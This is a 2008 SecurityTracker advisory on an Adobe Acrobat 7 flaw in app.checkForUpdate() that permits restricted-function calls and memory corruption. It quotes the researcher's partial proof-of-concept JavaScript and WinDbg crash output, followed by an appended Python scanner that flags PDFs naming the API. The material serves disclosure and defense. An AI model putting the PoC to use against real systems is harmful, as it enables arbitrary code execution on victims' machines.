SecurityTracker Alert ID: 1019971
SecurityTracker URL: http://securitytracker.com/id/1019971
Date: May 7 2008
Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Version(s): prior to 7.1.0
A vulnerability was reported in Adobe Acrobat and Adobe Reader. A remote user can cause arbitrary code to be executed on the target user's system.
Adobe Reader and Adobe Acrobat version 8.x are not affected.
The vendor was notified on November 2, 2007.
cocoruder reported this vulnerability.
A remote user can create a PDF file that, when loaded by the target user, will execute arbitrary code on the target user's system.
The vendor has issued a fixed version (7.1.0), available at:
The vendor's advisory is available at:
Vendor URL: www.adobe.com/support/security/bulletins/apsb08-13.html
Access control error
Underlying OS: Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (macOS/OS X), UNIX (Solaris - SunOS), Windows (Any)
This archive entry has one or more follow-up message(s) listed below.
Source Message Contents
and Memory Corruption Vulnerabilities
Acrobat Professional 7. A remote attacker who successfully exploits
these vulnerabilities can execute restricted functions and arbitrary
code on the affected system.
Affected Software Versions:
Adobe Acrobat Professional 7.0.9
These two vulnerabilities specially exist in an unpublicized
function called "app.checkForUpdate()", which are exploited through a
Following is the POC for how to execute restricted functions:
app.alert("It will call app.newDoc()");
app.alert("function has been called");
As we know, when we call "app.newDoc()" normally, the function can
but the above code can still execute this function successfully, other
restricted functions can also be executed by exploiting this
The POC for triggering the memory corruption vulnerability:
app.alert("Corrupting the memory");
// Open a new report will corrupt the memory
var rep = new Report();
app.alert("If the application has not been crashed, try to close the application and then you will get it.");
When we call the function "new Report()"(other functions maybe
useful too) in the function "Callback", it will corrupt the memory.
Debug information from WinDbg as follows:
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0946fb98 ebx=00000040 ecx=10101010 edx=0946fb90 esi=0946eaea edi=01c1dfbc
eip=10101010 esp=0012f6cc ebp=0012f77c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
10101010 001b add byte ptr [ebx],bl ds:0023:00000040=??
0:000> u eip
10101010 001b add byte ptr [ebx],bl
10101012 6c ins byte ptr es:[edi],dx
10101013 0000 add byte ptr [eax],al
10101015 1b640000 sbb esp,dword ptr [eax+eax]
10101019 336000 xor esp,dword ptr [eax]
1010101c 0033 add byte ptr [ebx],dh
1010101e 60 pushad
1010101f 0000 add byte ptr [eax],al
It is running code at an unexpected address.
working exploit for this vulnerability easily.
Note that because the special API does NOT exist in Adobe
Reader/Acrobat 8, as my test, the vulnerability does NOT affect Adobe
Adobe has released an advisory for this vulnerability which is available on:
Fortinet advisory can be found at:
2007.11.01 Vendor notified via email
2007.11.02 Vendor responded
2008.05.06 Coordinated public disclosure
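
A triage check a defender could run over inbound PDF files for the API named in this advisory, as an added example that is not part of the SecurityTracker entry or the researcher's message. Only the name app.checkForUpdate comes from the page; the function names and the sample documents are constructed for illustration.

```python
import re
import zlib

# The API name comes from the advisory; all other names here are hypothetical.
SUSPECT_API = "checkForUpdate"
NEEDLES = (SUSPECT_API.encode("ascii"), SUSPECT_API.encode("utf-16-be"))
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
NAME_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def decode_name_escapes(data: bytes) -> bytes:
    """Undo #xx escapes in PDF names, e.g. /J#61vaScript -> /JavaScript."""
    return NAME_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def candidate_buffers(pdf: bytes):
    """Yield the raw file, then each stream body inflated when it is Flate data."""
    yield pdf
    for match in STREAM_RE.finditer(pdf):
        try:
            # decompressobj tolerates a truncated trailer, unlike zlib.decompress
            yield zlib.decompressobj().decompress(match.group(1))
        except zlib.error:
            continue  # not Flate; the raw bytes were already yielded above


def scan_pdf(pdf: bytes) -> dict:
    """Flag documents that embed JavaScript and name the vulnerable API."""
    names = decode_name_escapes(pdf)
    has_js = b"/JavaScript" in names or b"/JS" in names
    hit = any(n in buf for buf in candidate_buffers(pdf) for n in NEEDLES)
    return {"has_javascript": has_js, "references_api": hit}


def build_sample(script: bytes, compress: bool) -> bytes:
    """Constructed PDF-like fragment for exercising the scanner (not a real PDF)."""
    body = zlib.compress(script) if compress else script
    filt = b"/Filter /FlateDecode " if compress else b""
    return (b"%PDF-1.4\n1 0 obj\n<< /S /J#61vaScript /JS 2 0 R >>\nendobj\n"
            b"2 0 obj\n<< " + filt + b"/Length %d >>\nstream\n" % len(body)
            + body + b"\nendstream\nendobj\n%%EOF\n")


if __name__ == "__main__":
    marker = b"/* constructed marker */ app.checkForUpdate"
    print(scan_pdf(build_sample(marker, compress=True)))
    print(scan_pdf(build_sample(b"app.alert(1);", compress=False)))
```

A name match is a triage signal only: script that assembles the name at run time will not be flagged, so the fixed version (7.1.0) remains the remedy.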